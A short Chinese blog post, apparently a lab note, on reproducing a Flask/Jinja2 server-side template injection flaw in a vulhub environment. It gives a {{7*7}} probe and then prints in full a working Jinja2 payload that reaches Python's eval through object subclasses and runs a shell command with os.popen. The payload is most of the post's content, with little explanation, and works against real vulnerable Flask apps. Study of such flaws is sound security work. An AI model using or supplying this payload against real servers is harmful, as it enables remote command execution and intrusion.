Flask(Jinja2) 服务端模板注入漏洞(SSTI)

XXX_WXY2023-11-09 11:41

Flask(Jinja2) 服务端模板注入漏洞(SSTI)

参考 https://www.freebuf.com/articles/web/260504.html

验证漏洞存在 ?name={{7*7}}

回显49说明漏洞存在

vulhub给出的payload:

python 复制代码 
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
相关推荐
emma羊羊15 分钟前
【AWVS】漏扫工具
网络·安全·web安全·awvs
superman超哥17 分钟前
仓颉借用检查器工作原理深度解析
c语言·开发语言·c++·python·仓颉
张彦峰ZYF32 分钟前
Python 项目文件组织与工程化实践
python·项目文件组织与工程化实践
webbodys1 小时前
Python文件操作与异常处理:构建健壮的应用程序
java·服务器·python
石工记1 小时前
对称加密 vs 非对称加密图解详解
java·网络安全
MediaTea2 小时前
Python:实例 __dict__ 详解
java·linux·前端·数据库·python
SunnyDays10112 小时前
Python Excel 打印设置全攻略(打印区域、缩放、页边距、页眉页脚等)
python·excel打印设置·excel页面设置·excel打印选项
小鸡吃米…2 小时前
Python的人工智能-机器学习
人工智能·python·机器学习
网安INF2 小时前
入侵检测系统(IDS)解析
网络·网络协议·安全·网络安全·ids
小娜老师3 小时前
Linux(Centos7)下进行OCR识别-pytesseract
flask·ocr
热门推荐
01GitHub 镜像站点02从快手“12·22”直播攻击事件看:一次教科书式的业务层饱和攻击033D 圣诞树网页代码04UV安装并设置国内源05Linux下V2Ray安装配置指南06在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)07Gemini3 生成的基于手势控制3D粒子圣诞树08解决 WSL Ubuntu 中 /etc/resolv.conf 自动重置问题09开源分享 | 超浪漫 3D 圣诞树立体动画(附零基础使用教程)10Claude Code Skills 实用使用手册